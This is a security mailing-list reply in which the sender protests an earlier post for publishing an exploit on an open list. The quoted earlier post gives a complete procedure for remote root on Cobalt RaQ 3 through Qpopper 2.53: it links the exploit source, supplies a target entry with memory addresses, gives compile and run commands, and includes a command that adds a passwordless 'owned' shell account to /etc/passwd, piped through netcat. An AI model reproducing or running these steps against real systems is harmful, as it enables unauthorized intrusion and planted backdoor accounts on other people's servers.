Re: [cobalt-security] Qpopper - remote root...

["Frank Cubillos" <cubillos@xxxxxxxxxxxxxxxxxx>]

Why the heck would you publish that on an open list!
Geez Louise think about the lurkers in here!! Man, am I going ballistic for
no reason?
Group?
Frank

> Hi,
> If you want to exploit a Cobalt RaQ 3, grab the Qpopper 2.53 exploit from
> http://www.hack.co.za/daem0n/pop/pop3/7350qpop.c, add the following line
> to the "targets[]" structure:
>   { "Cobalt OS 5.0: qpopper-2.53", 0xBFFFD368, 0xbfffdc18 },
> compile the exploit (gcc 7350qpop.c -o qpop-cobalt), and run it in the
> following fashion...:
> ./qpop-cobalt <target-id-you-made> foobar@xxxxxxxxxxx user@xxxxxxxxxxxxx
> echo owned::500:100:cracker:/:/bin/sh >>/etc/passwd 2>&1 >/dev/null | nc
> sendmail-server.com 25
> (user@xxxxxxxxxxxxx to, for example, gossi@xxxxxxxxxxxxxx, and
> sendmail-server.com to a mail server you can send through).  You'll need
> netcat installed on the box you are testing from.
> That'll add a remote user (owned, no password) to the cobalt.
> The attack doesn't require an account on the system - it simply needs you
> to know an account on the system which 'pop3' is being used to retrieve
> the mail of - I'd imagine this is a majority of accounts on Cobalts.